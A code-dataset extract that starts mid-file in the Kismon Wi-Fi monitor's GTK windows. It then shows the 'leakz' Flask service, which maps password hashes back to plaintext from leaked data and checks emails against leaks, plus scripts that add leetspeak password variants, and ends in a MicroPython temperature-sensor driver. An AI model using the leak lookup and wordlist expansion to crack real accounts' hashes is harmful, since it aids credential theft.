source = self.sources[uuid]
frame = Gtk.Frame()
frame.set_label(source['name'])
self.sources_list.pack_start(frame, False, False, 0)
table = Gtk.Table(n_rows=3, n_columns=3)
frame.add(table)
hop_button = Gtk.RadioButton.new_with_label_from_widget(None, 'Hop')
if source["hop"] > 0:
hop_button.clicked()
hop_button.connect("clicked", self.on_change_mode, uuid, "hop")
hop_button.set_property("xalign", 0)
hop_button.set_property("yalign", 0.4)
table.attach(hop_button, 0, 1, 0, 1)
field = Gtk.SpinButton()
field.set_numeric(True)
field.set_max_length(3)
field.set_increments(1, 10)
field.set_range(1, 100)
field.set_value(source["hop_rate"])
if source["hop"] == 0:
field.set_sensitive(False)
self.widgets[uuid]["hop"] = field
field.connect("changed", self.on_change_value, uuid, "hop")
table.attach(field, 1, 2, 0, 1, xoptions=Gtk.AttachOptions.SHRINK)
label = Gtk.Label(label="rate")
label.set_justify(Gtk.Justification.LEFT)
label.set_property("xalign", 0.1)
label.set_property("yalign", 0.5)
table.attach(label, 2, 3, 0, 1, xoptions=Gtk.AttachOptions.FILL)
lock_button = Gtk.RadioButton.new_with_label_from_widget(hop_button, "Lock")
if source["hop"] == 0:
lock_button.clicked()
lock_button.connect("clicked", self.on_change_mode, uuid, "lock")
lock_button.set_property("xalign", 0)
lock_button.set_property("yalign", 0.4)
table.attach(lock_button, 0, 1, 1, 2)
field = Gtk.SpinButton()
field.set_numeric(True)
field.set_max_length(3)
field.set_increments(1, 10)
field.set_range(1, 100)
if source["hop"] == 0:
field.set_value(int(source["channel"]))
else:
field.set_value(1)
field.set_sensitive(False)
self.widgets[uuid]["lock"] = field
field.connect("changed", self.on_change_value, uuid, "lock")
table.attach(field, 1, 2, 1, 2, xoptions=Gtk.AttachOptions.SHRINK)
label = Gtk.Label(label="channel")
label.set_justify(Gtk.Justification.FILL)
label.set_property("xalign", 0.1)
label.set_property("yalign", 0.5)
table.attach(label, 2, 3, 1, 2, xoptions=Gtk.AttachOptions.FILL)
button_box = Gtk.HButtonBox()
vbox.pack_end(button_box, False, False, 0)
cancel_button = Gtk.Button.new_with_mnemonic('_Cancel')
cancel_button.connect("clicked", self.on_cancel)
button_box.add(cancel_button)
apply_button = Gtk.Button.new_with_mnemonic('_Apply')
apply_button.connect("clicked", self.on_apply)
button_box.add(apply_button)
update_button = Gtk.Button.new_with_mnemonic('_Refresh')
update_button.connect("clicked", self.on_refresh)
button_box.add(update_button)
if self.vbox:
self.gtkwin.remove(self.vbox)
self.vbox = vbox
self.gtkwin.add(vbox)
self.gtkwin.show_all()
def on_change_mode(self, widget, uuid, mode):
if not widget.get_active():
return
self.changes[uuid] = mode
self.widgets[uuid][mode].set_sensitive(True)
if mode == "lock":
self.widgets[uuid]["hop"].set_sensitive(False)
else:
self.widgets[uuid]["lock"].set_sensitive(False)
def on_change_value(self, widget, uuid, mode):
self.changes[uuid] = mode
def on_apply(self, widget):
for uuid in self.changes:
mode = self.changes[uuid]
value = int(self.widgets[uuid][mode].get_value())
self.client_thread.client.set_channel(uuid, mode, value)
self.gtkwin.destroy()
def on_cancel(self, widget):
self.gtkwin.destroy()
def on_refresh(self, widget):
self.init_box()
```
#### File: kismon/windows/config.py
```python
from gi.repository import Gtk
class ConfigWindow:
def __init__(self, main_window):
self.gtkwin = Gtk.Window()
self.gtkwin.set_position(Gtk.WindowPosition.CENTER)
self.gtkwin.connect("destroy", self.on_destroy)
self.gtkwin.set_size_request(640, 320)
self.gtkwin.set_title("Kismon Preferences")
self.main_window = main_window
self.config = main_window.config
self.map = main_window.map
self.notebook = Gtk.Notebook()
self.gtkwin.add(self.notebook)
general_page = Gtk.Table(n_rows=2, n_columns=1)
general_page.set_property('margin', 5)
self.notebook.append_page(general_page)
self.notebook.set_tab_label_text(general_page, "General")
self.init_general_page(general_page)
map_page = Gtk.Table(n_rows=2, n_columns=1)
map_page.set_property('margin', 5)
self.notebook.append_page(map_page)
self.notebook.set_tab_label_text(map_page, "Map")
if self.map is None:
label = Gtk.Label(label="Map disabled")
map_page.attach(label, 0, 1, 0, 1, yoptions=Gtk.AttachOptions.SHRINK)
else:
self.init_map_page(map_page)
self.gtkwin.show_all()
def init_general_page(self, page):
frame = Gtk.Frame()
frame.set_label("Log List")
page.attach(frame, 0, 1, 0, 1, yoptions=Gtk.AttachOptions.SHRINK)
vbox = Gtk.VBox()
frame.add(vbox)
hbox = Gtk.HBox()
vbox.add(hbox)
label = Gtk.Label(label="Max rows in the log list: ")
label.set_property("xalign", 0)
label.set_property("yalign", 0.5)
label.set_justify(Gtk.Justification.RIGHT)
hbox.pack_start(label, False, False, 5)
field = Gtk.SpinButton()
field.set_numeric(True)
field.set_max_length(5)
field.set_increments(1, 100)
field.set_range(-1, 99999)
field.set_value(self.config["window"]["log_list_max"])
field.connect("output", self.on_change_log_list_max)
hbox.pack_start(field, False, False, 5)
label = Gtk.Label(label="-1 = unlimited 0 = disable")
label.set_property("xalign", 0)
label.set_property("yalign", 0.5)
hbox.pack_start(label, False, False, 5)
frame = Gtk.Frame()
frame.set_label("Autosave")
page.attach(frame, 0, 1, 1, 2, yoptions=Gtk.AttachOptions.SHRINK)
vbox = Gtk.VBox()
frame.add(vbox)
hbox = Gtk.HBox()
vbox.add(hbox)
label = Gtk.Label(label="Save the networks every (in minutes):")
hbox.pack_start(label, False, False, 5)
field = Gtk.SpinButton()
field.set_numeric(True)
field.set_max_length(5)
field.set_increments(1, 100)
field.set_range(0, 99999)
field.set_value(self.config["networks"]["autosave"])
field.connect("output", self.on_change_autosave)
hbox.pack_start(field, False, False, 5)
label = Gtk.Label(label="0 = disable")
label.set_property("xalign", 0)
label.set_property("yalign", 0.5)
hbox.pack_start(label, False, False, 5)
frame = Gtk.Frame()
frame.set_label("Tracks")
page.attach(frame, 0, 1, 2, 3, yoptions=Gtk.AttachOptions.SHRINK)
hbox = Gtk.HBox()
frame.add(hbox)
checkbox = Gtk.CheckButton.new_with_label("Store GPS Tracks")
if 'tracks' in self.config and self.config['tracks']['store'] is True:
checkbox.clicked()
checkbox.connect("clicked", self.on_change_tracks_store)
hbox.add(checkbox)
def on_change_log_list_max(self, widget):
if self.config["window"]["log_list_max"] == int(widget.get_value()):
return
self.config["window"]["log_list_max"] = int(widget.get_value())
self.main_window.log_list.cleanup(0)
def on_change_autosave(self, widget):
if self.config["networks"]["autosave"] == int(widget.get_value()):
return
self.config["networks"]["autosave"] = int(widget.get_value())
self.main_window.networks.set_autosave(self.config["networks"]["autosave"])
def on_change_tracks_store(self, widget):
self.config["tracks"]["store"] = widget.get_active()
def init_map_page(self, map_page):
position_frame = Gtk.Frame()
position_frame.set_label("Position")
map_page.attach(position_frame, 0, 1, 0, 1, yoptions=Gtk.AttachOptions.SHRINK)
position_vbox = Gtk.VBox()
position_frame.add(position_vbox)
map_widget = Gtk.RadioButton(group=None, label='In main window (default)')
if self.config["window"]["map_position"] == "widget":
map_widget.clicked()
map_widget.connect("clicked", self.main_window.on_map_widget)
position_vbox.add(map_widget)
        map_window = Gtk.RadioButton(group=map_widget, label='In separate window')
if self.config["window"]["map_position"] == "window":
map_window.clicked()
map_window.connect("clicked", self.main_window.on_map_window)
position_vbox.add(map_window)
map_hide = Gtk.RadioButton(group=map_widget, label='Hide')
if self.config["window"]["map_position"] == "hide":
map_hide.clicked()
map_hide.connect("clicked", self.main_window.on_map_hide)
position_vbox.add(map_hide)
source_frame = Gtk.Frame()
source_frame.set_label("Source")
source_vbox = Gtk.VBox()
source_frame.add(source_vbox)
map_page.attach(source_frame, 0, 1, 1, 2, yoptions=Gtk.AttachOptions.SHRINK)
first = None
for name, source in (("OpenStreetMap (default)", "openstreetmap"),
("OpenCycleMap", "opencyclemap"),
("Custom tile source", "custom")):
map_source = Gtk.RadioButton(group=first, label=name)
if first is None:
first = map_source
if self.config["map"]["source"] == source:
map_source.clicked()
map_source.connect("clicked", self.on_map_source, source)
source_vbox.add(map_source)
hbox = Gtk.HBox()
source_vbox.add(hbox)
label = Gtk.Label(label=" URL: ")
label.set_property("xalign", 0)
label.set_property("yalign", 0.5)
label.set_justify(Gtk.Justification.LEFT)
hbox.pack_start(label, False, False, 5)
entry = Gtk.Entry()
entry.set_width_chars(50)
entry.set_text(self.config["map"]["custom_source_url"])
entry.connect("changed", self.on_change_map_source_custom_url)
hbox.pack_start(entry, False, False, 5)
hbox = Gtk.HBox()
source_vbox.add(hbox)
x = 1
for name in (" Zoom Levels: ", " - "):
label = Gtk.Label(label=name)
label.set_property("xalign", 0)
label.set_property("yalign", 0.5)
label.set_justify(Gtk.Justification.LEFT)
hbox.pack_start(label, False, False, 5)
field = Gtk.SpinButton()
field.set_numeric(True)
field.set_max_length(5)
field.set_increments(1, 3)
field.set_range(1, 18)
if x == 1:
name = "custom_source_min"
else:
name = "custom_source_max"
field.set_value(self.config["map"][name])
field.connect("output", self.on_change_map_source_custom_zoom, name)
hbox.pack_start(field, False, False, 5)
x += 1
apply_button = Gtk.Button.new_with_mnemonic('_Apply')
apply_button.connect("clicked", self.on_map_source, "custom")
hbox.pack_start(apply_button, False, False, 5)
perf_frame = Gtk.Frame()
perf_frame.set_label("Performance")
perf_vbox = Gtk.VBox()
perf_frame.add(perf_vbox)
map_page.attach(perf_frame, 0, 1, 4, 5, yoptions=Gtk.AttachOptions.SHRINK)
perf_marker_positions = Gtk.CheckButton.new_with_label("Update marker positions")
if self.config["map"]["update_marker_positions"] is True:
perf_marker_positions.clicked()
perf_marker_positions.connect("clicked", self.on_update_marker_positions)
perf_vbox.add(perf_marker_positions)
def on_destroy(self, window):
self.gtkwin = None
def on_map_source(self, widget, source):
if (type(widget) == Gtk.RadioButton and widget.get_active()) or type(widget) == Gtk.Button:
self.map.change_source(source)
if self.config["window"]["map_position"] == "widget":
self.main_window.on_map_widget(None, True)
elif self.config["window"]["map_position"] == "window":
self.main_window.map_window.gtkwin.add(self.main_window.map.widget)
self.main_window.map_window.gtkwin.show_all()
def on_change_map_source_custom_url(self, widget):
self.config["map"]["custom_source_url"] = widget.get_text()
def on_change_map_source_custom_zoom(self, widget, name):
self.config["map"][name] = int(widget.get_value())
def on_update_marker_positions(self, widget):
self.config["map"]["update_marker_positions"] = widget.get_active()
```
#### File: kismon/windows/map.py
```python
from .template import TemplateWindow
class MapWindow(TemplateWindow):
def __init__(self, map):
TemplateWindow.__init__(self)
self.gtkwin.set_title("Map")
self.gtkwin.show()
self.gtkwin.set_size_request(320, 240)
self.gtkwin.resize(640, 480)
self.map = map
self.gtkwin.add(self.map.widget)
def on_destroy(self, window):
self.remove_map()
self.gtkwin = None
def remove_map(self):
if self.gtkwin is not None:
self.gtkwin.remove(self.map.widget)
def hide(self):
self.gtkwin.hide()
```
#### File: kismon/windows/signal.py
```python
import time
from gi.repository import Gtk
from gi.repository import GObject
class SignalWindow:
def __init__(self, mac, destroy, seconds=120):
self.mac = mac
self.history = {}
self.sources = {}
self.time_range = seconds
self.colors = [
(0, 1, 0),
(1, 0, 0),
(0, 0, 1),
(1, 1, 0),
(0, 1, 1),
(0, 0.5, 0),
(0.5, 0, 0),
(0, 0, 0.5),
]
self.graph_type = "signal"
self.gtkwin = Gtk.Window()
self.gtkwin.set_position(Gtk.WindowPosition.CENTER)
self.gtkwin.connect("destroy", destroy, mac)
self.gtkwin.set_default_size(620, 320)
self.gtkwin.set_title("Signal Graph: %s" % self.mac)
self.graph = Gtk.DrawingArea()
self.graph.connect("draw", self.on_draw_event)
button_box = Gtk.HButtonBox()
signal_button = Gtk.RadioButton(label='Signal strength')
signal_button.connect("clicked", self.on_graph_type, "signal")
signal_button.clicked()
button_box.add(signal_button)
packets_button = Gtk.RadioButton(group=signal_button, label='Packets per second')
packets_button.connect("clicked", self.on_graph_type, "packets")
button_box.add(packets_button)
self.sources_list = Gtk.TreeView()
tvcolumn = Gtk.TreeViewColumn("Color")
cell = Gtk.CellRendererText()
tvcolumn.pack_start(cell, True)
cell.set_property('background-set', True)
tvcolumn.set_attributes(cell, text=0, background=9)
self.sources_list.append_column(tvcolumn)
num = 1
for column in ("Name", "Type", "Signal (dbm)", "Min", "Max", "Packets/sec", "Packets", "Server"):
tvcolumn = Gtk.TreeViewColumn(column)
self.sources_list.append_column(tvcolumn)
cell = Gtk.CellRendererText()
tvcolumn.pack_start(cell, True)
tvcolumn.add_attribute(cell, 'text', num)
num += 1
self.sources_list_store = Gtk.ListStore(
GObject.TYPE_STRING,
GObject.TYPE_STRING,
GObject.TYPE_STRING,
GObject.TYPE_INT,
GObject.TYPE_INT,
GObject.TYPE_INT,
GObject.TYPE_INT,
GObject.TYPE_INT,
GObject.TYPE_INT, # server
GObject.TYPE_STRING, # bg color
)
self.sources_list.set_model(self.sources_list_store)
expander = Gtk.Expander()
expander.set_label("Sources")
expander.set_expanded(True)
expander.add(self.sources_list)
vbox = Gtk.VBox()
vbox.pack_start(button_box, expand=False, fill=False, padding=0)
vbox.add(self.graph)
vbox.pack_end(expander, expand=False, fill=False, padding=0)
self.gtkwin.add(vbox)
self.gtkwin.show_all()
def on_graph_type(self, widget, graph_type):
if not widget.get_active():
return
self.graph_type = graph_type
self.graph.queue_draw()
def on_draw_event(self, widget, context):
width = self.graph.get_allocated_width()
height = self.graph.get_allocated_height()
self.draw_graph(width, height, context)
for uuid in self.sources:
source = self.sources[uuid]
line = ['#', source["name"], source["type"],
source["signal"], source["signal_min"], source["signal_max"],
source["pps"], source["packets"], source["server"], self.get_color(uuid, return_hex=True)]
if "iter" in source:
source_iter = source["iter"]
num = 0
for value in line:
self.sources_list_store.set_value(source_iter, num, value)
num += 1
else:
source["iter"] = self.sources_list_store.append(line)
def draw_graph(self, width, height, ctx):
border_left = 60
border_right = 0
border_bottom = 30
graph_width = width - border_left - border_right
graph_height = height - border_bottom
if self.graph_type == "signal":
index = 0
data_min = -100
data_max = -50
data_step = 5
text = "%s dbm"
else:
index = 1
data_min = 0
data_max = 20
data_step = 2
text = "%s p/s"
if len(self.history) > 0:
start_sec = max(self.history) - self.time_range
else:
start_sec = 0
x_rel = 1.0 * graph_width / self.time_range
for sec in self.history:
if sec < start_sec:
continue
for uuid in self.history[sec]:
data_min = min(data_min, self.history[sec][uuid][index])
data_max = max(data_max, self.history[sec][uuid][index])
data_max += 1
data_range = data_max - data_min
y_rel = 1.0 * graph_height / data_range
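        # Note (not in the original source): cairo's y axis grows downward, so
        # y = y_rel * (data_max - value), used below, places larger values
        # nearer the top of the graph.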
# background
ctx.set_source_rgb(0, 0, 0)
ctx.rectangle(0, 0, width, height)
ctx.fill()
ctx.stroke()
# legend
ctx.set_line_width(1)
ctx.set_source_rgb(1, 1, 1)
ctx.move_to(border_left, 0)
ctx.line_to(border_left, graph_height + 5)
ctx.move_to(border_left - 5, graph_height)
ctx.line_to(width - border_right, height - border_bottom)
ctx.line_to(width - border_right, 0)
ctx.move_to(border_left - 55, graph_height + 4)
ctx.show_text(text % data_min)
while True:
r = range(data_min, data_max, data_step)
if len(r) > 6: # max. 6 horizontal lines
data_step = data_step * 2
else:
break
for value in r:
y = y_rel * (data_max - value)
ctx.move_to(border_left - 5, y)
ctx.line_to(width - border_right, y)
ctx.move_to(border_left - 55, y + 4)
ctx.show_text(text % value)
ctx.move_to(border_left - 15, graph_height + 16)
ctx.show_text("-%ss" % self.time_range)
ctx.move_to(border_left + graph_width / 2, graph_height + 1)
ctx.line_to(border_left + graph_width / 2, graph_height + 6)
ctx.move_to(border_left + graph_width / 2 - 12, graph_height + 16)
ctx.show_text("-%ss" % (self.time_range / 2))
ctx.stroke()
# graph
ctx.set_line_width(2)
ctx.set_source_rgb(0, 1, 0)
if len(self.history) < 2:
ctx.move_to(width / 2, height / 2)
ctx.show_text("collecting data")
ctx.stroke()
return False
for uuid in self.sources:
start = False
sec = 0
color = self.get_color(uuid)
ctx.set_source_rgb(*color)
while True:
if start_sec + sec in self.history and uuid in self.history[start_sec + sec]:
value = self.history[start_sec + sec][uuid][index]
x = x_rel * sec + border_left
y = y_rel * (data_max - value)
if not start:
ctx.move_to(x, y)
start = True
sec += 1
else:
ctx.line_to(x, y)
sec += 1
if sec > self.time_range:
break
ctx.stroke()
return False
def get_color(self, uuid, return_hex=False):
try:
color = self.colors[self.sources[uuid]["number"]]
        except (IndexError, KeyError):  # more sources than predefined colors, or unknown uuid
color = (1, 1, 1)
if return_hex:
color = "#%0.2X%0.2X%0.2X" % (color[0] * 255, color[1] * 255, color[2] * 255)
return color
def add_value(self, source_data, packets, signal, timestamp, server_id):
uuid = "%i-%s" % (server_id, source_data["uuid"])
if uuid not in self.sources:
self.sources[uuid] = source_data
source = source_data
source["number"] = len(self.sources) - 1
source["server"] = server_id + 1
source["signal"] = signal
source["signal_min"] = signal
source["signal_max"] = signal
source["packets"] = packets
source["pps"] = 0
else:
source = self.sources[uuid]
source["signal"] = signal
source["signal_min"] = min(signal, source["signal_min"])
source["signal_max"] = max(signal, source["signal_max"])
source["pps"] = packets - source["packets"]
source["packets"] = packets
if timestamp not in self.history:
self.history[timestamp] = {}
self.history[timestamp][uuid] = (signal, source["pps"])
self.graph.queue_draw()
``` |
{
"source": "84KaliPleXon3/leakz",
"score": 2
} |
#### File: 84KaliPleXon3/leakz/app.py
```python
import os
import re
import sys
import json
import locale
import pymongo
import datetime
from flask import abort
from flask import Flask
from flask import request
from flask import jsonify
from flask import render_template
from datetime import datetime
from influxdb import InfluxDBClient
reload(sys)
sys.setdefaultencoding('utf8')
locale.setlocale(locale.LC_ALL, 'de_DE.UTF-8')
app = Flask(__name__, static_folder='static', static_url_path='')
@app.template_filter()
def format_time(timestamp):
return datetime.strptime(timestamp.replace('Z', ''), '%Y%m%d%H%M%S').strftime('%d.%m.%Y %H:%M')
def connect_database(database, port, uri):
secret = get_secret()
client = pymongo.MongoClient('mongodb://{}:{}/'.format(uri, port),
username='pymongo',
password=<PASSWORD>,
authSource=database,
authMechanism='SCRAM-SHA-1')
return client[database]
def get_config():
path = os.path.abspath(os.path.join(os.path.dirname(__file__), '.config'))
return ''.join(load_document(path))
def get_secret():
path = os.path.abspath(os.path.join(os.path.dirname(__file__), '.secret'))
return load_document(path)[0].strip()
def load_document(filename):
try:
with open(filename, 'rb') as f:
return f.readlines()
except IOError as e:
print e
sys.exit(1)
def get(iterable, keys):
try:
result = iterable
for key in keys:
result = result[key]
return result
except (KeyError, IndexError) as e:
return None
def guess_hash(hash_string):
m = re.match(r'^[0-9a-fA-F]+$', hash_string)
if m:
hash = {
32: 'hash.md5',
40: 'hash.sha1',
56: 'hash.sha224',
64: 'hash.sha256',
96: 'hash.sha384',
128: 'hash.sha512'
}
if len(hash_string) in hash:
return hash[len(hash_string)], hash_string.lower()
return 'password', hash_string
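# Illustrative examples (not part of the original source):
#   guess_hash('5F4DCC3B5AA765D61D8327DEB882CF99') -> ('hash.md5', '5f4dcc3b5aa765d61d8327deb882cf99')
#   guess_hash('not-a-hex-string')                 -> ('password', 'not-a-hex-string')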
def search_hash_or_password(collection, param_query):
key, hash = guess_hash(param_query)
return list(collection.find({key: hash}, {'_id': 0}))
def api_search_hash(collection, param_query):
key, hash = guess_hash(param_query)
try:
return list(collection.find({key: hash}, {'_id': 0, 'password': 1}))[0]
except IndexError as e:
return []
def api_search_password(collection, param_query):
key, hash = guess_hash(param_query)
try:
return list(collection.find({key: hash}, {'_id': 0, 'password': 0}))[0]['hash']
except IndexError as e:
return []
def api_search_mail(collection, param_query):
try:
result = list(collection.find({'mail': param_query}, {'_id': 0, 'mail': 0}))[0]
return {
'leaked': ', '.join(result['leak'])
}
except IndexError as e:
return []
def handle_pagination(param_skip, param_limit):
if param_skip == 0:
param_skip = 10
entries = range(param_skip, (param_skip + param_limit * 8), param_limit)
last_entry = (entries[-1] + param_limit)
if entries[-1] <= 80:
first_entry = 0
else:
first_entry = (entries[-1] - 80)
return first_entry, last_entry, entries
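# Illustrative example (not part of the original source):
#   handle_pagination(0, 10) -> (0, 90, [10, 20, 30, 40, 50, 60, 70, 80])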
def match_mail_address(document):
return re.match(r'\b[\w.+-]+?@[-_\w]+[.]+[-_.\w]+\b', document)
@app.route('/', methods=['GET'])
def show_homepage():
config = json.loads(get_config())
db = connect_database(config['mongodb_db'], config['mongodb_port'], config['mongodb_uri'])
amount_hashes = db['passwords'].count()
amount_mails = db['mails'].count()
return render_template('home.html',
amount_hashes='{:n}'.format(amount_hashes),
amount_mails='{:n}'.format(amount_mails),
title='Is my mail address leaked?',
searchform_visible=True,
alert_visible=True)
@app.route('/api', methods=['GET'])
def show_api():
return render_template('api.html',
menu_is_active='api')
@app.route('/legal', methods=['GET'])
def show_legal():
return render_template('legal.html')
@app.route('/privacy', methods=['GET'])
def show_privacy():
return render_template('privacy.html')
@app.route('/hash/latest', methods=['GET'])
def show_hash_list():
config = json.loads(get_config())
db = connect_database(config['mongodb_db'], config['mongodb_port'], config['mongodb_uri'])
collection = db['passwords']
try:
param_skip = int(request.args.get('skip'))
except (ValueError, TypeError) as e:
param_skip = 0
try:
param_limit = int(request.args.get('limit'))
if param_limit > 200:
param_limit = 200
except (ValueError, TypeError) as e:
param_limit = 10
pagination_list = handle_pagination(param_skip, param_limit)
result_list = list(collection.find().skip(
param_skip).limit(param_limit).sort([('$natural', -1)]))
return render_template('latest.html',
result_type='hash',
url='/hash/latest',
menu_is_active='latest',
result_list=result_list,
entries=pagination_list[2],
last_entry=pagination_list[1],
first_entry=pagination_list[0])
@app.route('/api/hash/<param_query>', methods=['GET'])
def api_query_hash(param_query):
config = json.loads(get_config())
influx_client = InfluxDBClient(config['influxdb_uri'], config['influxdb_port'], 'root', 'root', config['influxdb_db'])
influx_client.create_database(config['influxdb_db'])
db = connect_database(config['mongodb_db'], config['mongodb_port'], config['mongodb_uri'])
collection = db['passwords']
data = api_search_hash(collection, param_query)
influx_json_body = [{
'measurement': 'api_endpoint_short',
'tags': {
'endpoint': 'hash'
},
'time': datetime.utcnow(),
'fields': {
'status': 200 if data else 404,
'value': param_query.lower()
}
}]
influx_client.write_points(influx_json_body)
if data:
return jsonify(data)
else:
return abort(404)
@app.route('/api/password/<param_query>', methods=['GET'])
def api_query_password(param_query):
config = json.loads(get_config())
influx_client = InfluxDBClient(config['influxdb_uri'], config['influxdb_port'], 'root', 'root', config['influxdb_db'])
influx_client.create_database(config['influxdb_db'])
db = connect_database(config['mongodb_db'], config['mongodb_port'], config['mongodb_uri'])
collection = db['passwords']
data = api_search_password(collection, param_query)
influx_json_body = [{
'measurement': 'api_endpoint_short',
'tags': {
'endpoint': 'password'
},
'time': datetime.utcnow(),
'fields': {
'status': 200 if data else 404,
'value': param_query
}
}]
influx_client.write_points(influx_json_body)
if data:
return jsonify(data)
else:
return abort(404)
@app.route('/api/mail/<param_query>', methods=['GET'])
def api_query_mail(param_query):
config = json.loads(get_config())
influx_client = InfluxDBClient(config['influxdb_uri'], config['influxdb_port'], 'root', 'root', config['influxdb_db'])
influx_client.create_database(config['influxdb_db'])
db = connect_database(config['mongodb_db'], config['mongodb_port'], config['mongodb_uri'])
collection = db['mails']
data = api_search_mail(collection, param_query)
influx_json_body = [{
'measurement': 'api_endpoint_short',
'tags': {
'endpoint': 'mail'
},
'time': datetime.utcnow(),
'fields': {
'status': 200 if data else 404,
'value': param_query.lower()
}
}]
influx_client.write_points(influx_json_body)
if data:
return jsonify(data)
else:
return abort(404)
@app.route('/hash/<param_query>', methods=['GET'])
def show_hash_value(param_query):
config = json.loads(get_config())
influx_client = InfluxDBClient(config['influxdb_uri'], config['influxdb_port'], 'root', 'root', config['influxdb_db'])
influx_client.create_database(config['influxdb_db'])
db = connect_database(config['mongodb_db'], config['mongodb_port'], config['mongodb_uri'])
col_password = db['<PASSWORD>']
result_list = search_hash_or_password(col_password, param_query)
result_type = 'hash'
influx_json_body = [{
'measurement': 'api_endpoint_short',
'tags': {
'endpoint': 'hash'
},
'time': datetime.utcnow(),
'fields': {
'status': 200 if len(result_list) > 0 else 404,
'value': param_query.lower()
}
}]
influx_client.write_points(influx_json_body)
return render_template('home.html',
title='Detailed information',
result_list=result_list,
result_type=result_type,
param_query=param_query,
searchform_visible=False,
pagination_visible=False)
@app.route('/search', methods=['GET'])
def show_hash():
config = json.loads(get_config())
influx_client = InfluxDBClient(config['influxdb_uri'], config['influxdb_port'], 'root', 'root', config['influxdb_db'])
influx_client.create_database(config['influxdb_db'])
db = connect_database(config['mongodb_db'], config['mongodb_port'], config['mongodb_uri'])
col_password = db['<PASSWORD>']
col_mail = db['mails']
try:
param_query = request.args.get('q')
except (ValueError, TypeError) as e:
param_query = ''
if match_mail_address(param_query):
result_list = list(col_mail.find({'mail': param_query}))
result_type = 'mail'
else:
result_list = search_hash_or_password(col_password, param_query)
result_type = 'hash'
return render_template('home.html',
result_list=result_list,
result_type=result_type,
param_query=param_query,
title='Is my mail address leaked?',
pagination_visible=False,
searchform_visible=True)
@app.route('/api/cert/<param_query>', methods=['GET'])
def api_query_cert(param_query):
config = json.loads(get_config())
db = connect_database(config['mongodb_db'], config['mongodb_port'], config['mongodb_uri'])
collection = db['certs']
result_list = list(collection.find(
{'subject.common_name': param_query}, {'_id': 0}))
if len(result_list) == 0:
return 'ERROR no result was found'
return render_template('certificate.html',
result_list=result_list)
@app.route('/cert', methods=['GET'])
def find_all_cert():
config = json.loads(get_config())
db = connect_database(config['mongodb_db'], config['mongodb_port'], config['mongodb_uri'])
collection = db['certs']
result_list = list(collection.find({}, { '_id': 0 }).limit(10))
return render_template('certificate.html', result_list=result_list)
if __name__ == '__main__':
app.run(host="0.0.0.0", port=5000, threaded=True)
```
#### File: leakz/resources/convert_into_leetspeak.py
```python
import os
import sys
import json
import pymongo
import hashlib
from pymongo.errors import WriteError
from pymongo.errors import DuplicateKeyError
import utils.database_helper as dbh
import utils.password_handling as ph
import utils.file_handling as fh
def insert_one(collection, password_string, hash_string):
try:
inserted_id = collection.insert_one(
{'password': password_string.decode('utf-8'), 'hash': hash_string}).inserted_id
print u'[I] Added {} with id: {}'.format(password_string.decode('utf-8'), inserted_id)
except (UnicodeDecodeError) as e:
print u'[E] {}'.format(e)
sys.exit(1)
except (DuplicateKeyError, WriteError) as e:
print u'[E] {}'.format(e)
def simple_leetspeak(text):
pattern = {'a': '4', 'A': '4', 'b': '8', 'B': '8', 'e': '3', 'E': '3', 'g': '6',
'G': '6', 'i': '1', 'I': '1', 'o': '0', 'O': '0', 's': '5', 'S': '5',
't': '7', 'T': '7'}
for key, value in pattern.iteritems():
text = text.replace(key, value)
return text
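# Illustrative example (not part of the original source):
#   simple_leetspeak('Password') -> 'P455w0rd'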
def main():
config = json.loads(fh.get_config())
db = dbh.connect_database(config['db_name'], config['db_port_passwords'])
collection = db['passwords']
try:
collection.create_index("password", unique=True)
collection.create_index("hash.md5", unique=True)
collection.create_index("hash.sha1", unique=True)
collection.create_index("hash.sha224", unique=True)
collection.create_index("hash.sha256", unique=True)
collection.create_index("hash.sha384", unique=True)
collection.create_index("hash.sha512", unique=True)
except pymongo.errors.OperationFailure as e:
print e
sys.exit(1)
documents = dbh.find_all_documents(collection)
for document in documents:
password = document['password'].encode('utf-8')
leetspeak = simple_leetspeak(password)
if leetspeak != password:
hash_string = ph.hash_password(leetspeak)
insert_one(collection, leetspeak, hash_string)
if __name__ == '__main__':
main()
```
#### File: leakz/resources/generate_bcrypt.py
```python
import sys
import bcrypt
import pymongo
from pymongo.errors import WriteError
from pymongo.errors import BulkWriteError
from pymongo.errors import DuplicateKeyError
import utils.file_handling as fh
def connect_database(database, port):
secret = fh.get_secret()
client = pymongo.MongoClient('mongodb://localhost:{}/'.format(port),
username='pymongo', password=<PASSWORD>, authSource=database, authMechanism='SCRAM-SHA-1')
return client[database]
def insert_one(collection, password_string, hash_string):
try:
inserted_id = collection.insert_one({'password': <PASSWORD>, 'hash': hash_string}).inserted_id
print u'[I] Added {} with id: {}'.format(hash_string, inserted_id)
except (DuplicateKeyError, WriteError) as e:
print u'[E] {}'.format(e)
def create_bcrypt_hash(collection):
passwd = b"<PASSWORD>"
for i in xrange(7998152934):
salt = bcrypt.gensalt(rounds=12, prefix=b'2b')
hashed_pwd = bcrypt.hashpw(passwd, salt)
insert_one(collection, passwd, hashed_pwd)
def main():
db = connect_database('intel', '27017')
collection = db['bcrypt']
try:
collection.create_index("hash", unique=True)
except pymongo.errors.OperationFailure as e:
print e
sys.exit(1)
create_bcrypt_hash(collection)
if __name__ == '__main__':
main()
```
#### File: resources/utils/file_handling.py
```python
import os
import sys
def load_document(filename):
try:
with open(filename, 'r') as f:
return f.readlines()
except IOError as e:
print e
sys.exit(1)
def save_document(filename, document):
with open(filename, 'w') as f:
f.write(document)
def get_secret():
path = os.path.abspath(os.path.join(
os.path.dirname(__file__), '../../.secret'))
return load_document(path)[0].strip()
def get_config():
path = os.path.abspath(os.path.join(
os.path.dirname(__file__), '../../.config'))
return ''.join(load_document(path))
``` |
{
"source": "84KaliPleXon3/micropython-esp32",
"score": 4
} |
#### File: drivers/onewire/ds18x20.py
```python
from onewire import OneWire
class DS18X20(object):
def __init__(self, pin):
self.ow = OneWire(pin)
# Scan the 1-wire devices, but only keep those which have the
# correct # first byte in their rom for a DS18x20 device.
self.roms = [rom for rom in self.ow.scan() if rom[0] == 0x10 or rom[0] == 0x28]
def read_temp(self, rom=None):
"""
Read and return the temperature of one DS18x20 device.
Pass the 8-byte bytes object with the ROM of the specific device you want to read.
If only one DS18x20 device is attached to the bus you may omit the rom parameter.
"""
rom = rom or self.roms[0]
ow = self.ow
ow.reset()
ow.select_rom(rom)
ow.write_byte(0x44) # Convert Temp
while True:
if ow.read_bit():
break
ow.reset()
ow.select_rom(rom)
ow.write_byte(0xbe) # Read scratch
data = ow.read_bytes(9)
return self.convert_temp(rom[0], data)
def read_temps(self):
"""
